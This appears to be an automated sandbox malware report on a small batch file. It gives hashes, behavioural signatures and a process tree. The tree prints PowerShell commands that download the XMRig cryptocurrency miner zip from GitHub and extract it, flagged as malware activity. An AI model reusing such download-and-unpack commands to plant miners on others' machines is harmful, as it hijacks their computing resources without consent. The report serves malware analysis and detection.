Overview
overview
10Static
static
1tesy - Copy (10).bat
windows7-x64
10tesy - Copy (10).bat
windows10-2004-x64
10tesy - Copy (11).bat
windows7-x64
10tesy - Copy (11).bat
windows10-2004-x64
10tesy - Copy (12).bat
windows7-x64
10tesy - Copy (12).bat
windows10-2004-x64
10tesy - Copy (13).bat
windows7-x64
10tesy - Copy (13).bat
windows10-2004-x64
10tesy - Copy (14).bat
windows7-x64
10tesy - Copy (14).bat
windows10-2004-x64
10tesy - Copy (2).bat
windows7-x64
10tesy - Copy (2).bat
windows10-2004-x64
10tesy - Copy (3).bat
windows7-x64
10tesy - Copy (3).bat
windows10-2004-x64
10tesy - Copy (4).bat
windows7-x64
10tesy - Copy (4).bat
windows10-2004-x64
10tesy - Copy (5).bat
windows7-x64
10tesy - Copy (5).bat
windows10-2004-x64
10tesy - Copy (7).bat
windows7-x64
10tesy - Copy (7).bat
windows10-2004-x64
10tesy - Copy (8).bat
windows7-x64
10tesy - Copy (8).bat
windows10-2004-x64
10tesy - Copy (9).bat
windows7-x64
10tesy - Copy (9).bat
windows10-2004-x64
10tesy - Copy.bat
windows7-x64
10tesy - Copy.bat
windows10-2004-x64
10tesy.bat
windows7-x64
10tesy.bat
windows10-2004-x64
10Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
22-12-2023 05:54
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
tesy - Copy (10).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (11).bat
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
tesy - Copy (11).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (12).bat
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
tesy - Copy (12).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (13).bat
Resource
win7-20231129-en
Behavioral task
behavioral8
Sample
tesy - Copy (13).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
tesy - Copy (14).bat
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
tesy - Copy (14).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (2).bat
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
tesy - Copy (2).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (3).bat
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
tesy - Copy (3).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
tesy - Copy (4).bat
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
tesy - Copy (4).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
tesy - Copy (5).bat
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
tesy - Copy (5).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
tesy - Copy (7).bat
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
tesy - Copy (7).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
tesy - Copy (8).bat
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
tesy - Copy (8).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
tesy - Copy (9).bat
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
tesy - Copy (9).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
tesy - Copy.bat
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
tesy - Copy.bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
tesy.bat
Resource
win7-20231215-en
General
-
Target
tesy - Copy (13).bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2928 powershell.exe 6 2928 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2928 powershell.exe 2824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3044 wrote to memory of 2928 3044 cmd.exe 29 PID 3044 wrote to memory of 2928 3044 cmd.exe 29 PID 3044 wrote to memory of 2928 3044 cmd.exe 29 PID 3044 wrote to memory of 2824 3044 cmd.exe 30 PID 3044 wrote to memory of 2824 3044 cmd.exe 30 PID 3044 wrote to memory of 2824 3044 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (13).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3LENDHPYOE5NVJBC25U5.temp
Filesize7KB
MD5eb38d210d429aabdde9185cd46cba84a
SHA14df202e25f505bb23d40855aad92d334fab3f209
SHA256adfae30898d10bbd4fd861aaf50cc50b530d11a7029edca647a97fb8223bba57
SHA5121d12e3323fa1fe105e55215bef9ebfafe2ccb3abee2dbc2aa66af4c2f5ff768514201162a64ff7de700936ad3903479d3dd1c677e3e2fa621b3e6c98e81c6670